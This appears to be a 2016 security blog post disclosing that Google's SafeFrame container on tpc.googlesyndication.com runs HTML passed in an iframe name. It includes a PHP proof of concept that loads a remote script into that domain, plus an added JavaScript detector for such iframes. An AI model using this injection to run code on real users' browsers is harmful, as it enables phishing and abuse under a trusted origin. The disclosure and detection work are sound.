Embed any HTML into tpc.googlesyndication.com

Date: 10 Jun 2016
Author: Erik Dubbelboer

Google uses tpc.googlesyndication.com for ad serving and allows essentially anything to run on this domain. A container HTML file hosted on the domain reads the name of its iframe and injects the content carried in that name into the page. We can use this to run anything we want on this Google domain.

Example PHP code:

<?php

$html = '<script src="http://dubbelboer.com/googlebug/exploit.js"></script>';

// The format for the name needs to be "1-0-1;<length of content>;<content>"
echo '<iframe name="1-0-1;' . strlen($html) . ';' . htmlentities($html) . '"';
echo ' src="http://tpc.googlesyndication.com/safeframe/1-0-1/html/container.html"></iframe>';

This example can be found at http://dubbelboer.com/googlebug/index.php

In my example, exploit.js just contains an alert statement to show the domain. In theory this could contain any code.
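For reviewing ad markup or saved pages for this pattern, the following added example (not code from the original post or from Google) finds iframes that load the container page and reports what their name attribute would inject, including any script URLs. It assumes the name format is exactly as described above; the function names, the regex-based HTML scan and the example.test URL are constructed for illustration.

```javascript
// Added example (not from the original post): list what container iframes would inject.
// Assumption: the name format is "<version>;<length>;<content>", as the post states.
const CONTAINER_RE =
  /^https?:\/\/tpc\.googlesyndication\.com\/safeframe\/[^/]+\/html\/container\.html/i;

// Undo htmlentities()-style encoding of an attribute value (common entities only).
function decodeEntities(s) {
  const map = { lt: '<', gt: '>', quot: '"', amp: '&', '#039': "'" };
  return s.replace(/&(lt|gt|quot|amp|#039);/g, (_, e) => map[e]);
}

// Split the name into its three fields and check the declared length.
function parseFrameName(name) {
  const m = /^([^;]*);(\d+);([\s\S]*)$/.exec(name);
  if (!m) return null;
  const declared = Number(m[2]);
  // PHP strlen() counts bytes, so compare against the UTF-8 byte length.
  const actual = new TextEncoder().encode(m[3]).length;
  return { version: m[1], declared, content: m[3], lengthMatches: declared === actual };
}

// One finding per container iframe: decoded payload plus any script URLs in it.
function auditHtml(html) {
  const findings = [];
  for (const tag of html.match(/<iframe\b[^>]*>/gi) || []) {
    const attr = (n) => {
      const a = new RegExp(`\\b${n}\\s*=\\s*"([^"]*)"`, 'i').exec(tag);
      return a ? decodeEntities(a[1]) : null;
    };
    const src = attr('src');
    if (!src || !CONTAINER_RE.test(src)) continue;
    const parsed = parseFrameName(attr('name') || '');
    if (!parsed) continue;
    const scripts = [...parsed.content.matchAll(/<script\b[^>]*\bsrc\s*=\s*["']([^"']+)["']/gi)]
      .map((x) => x[1]);
    findings.push({ src, ...parsed, scripts });
  }
  return findings;
}

// Constructed sample: markup shaped like the PHP output, with a placeholder script URL.
const payload = '<script src="http://example.test/a.js"></script>';
const encoded = payload.replace(/&/g, '&amp;').replace(/</g, '&lt;')
  .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
const SAMPLE = `<p>ad slot</p><iframe name="1-0-1;${payload.length};${encoded}"` +
  ' src="http://tpc.googlesyndication.com/safeframe/1-0-1/html/container.html"></iframe>' +
  '<iframe name="x" src="https://example.test/other.html"></iframe>';

console.log(JSON.stringify(auditHtml(SAMPLE), null, 2));
```

Any finding whose script hosts are not ones you expect from your ad provider is worth a closer look, since the content runs under the tpc.googlesyndication.com origin regardless of who supplied it.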

This has been reported to Google but they said they don’t care what is run on the domain. I guess they never place any sensitive cookies on this domain and don’t expect others to do either.
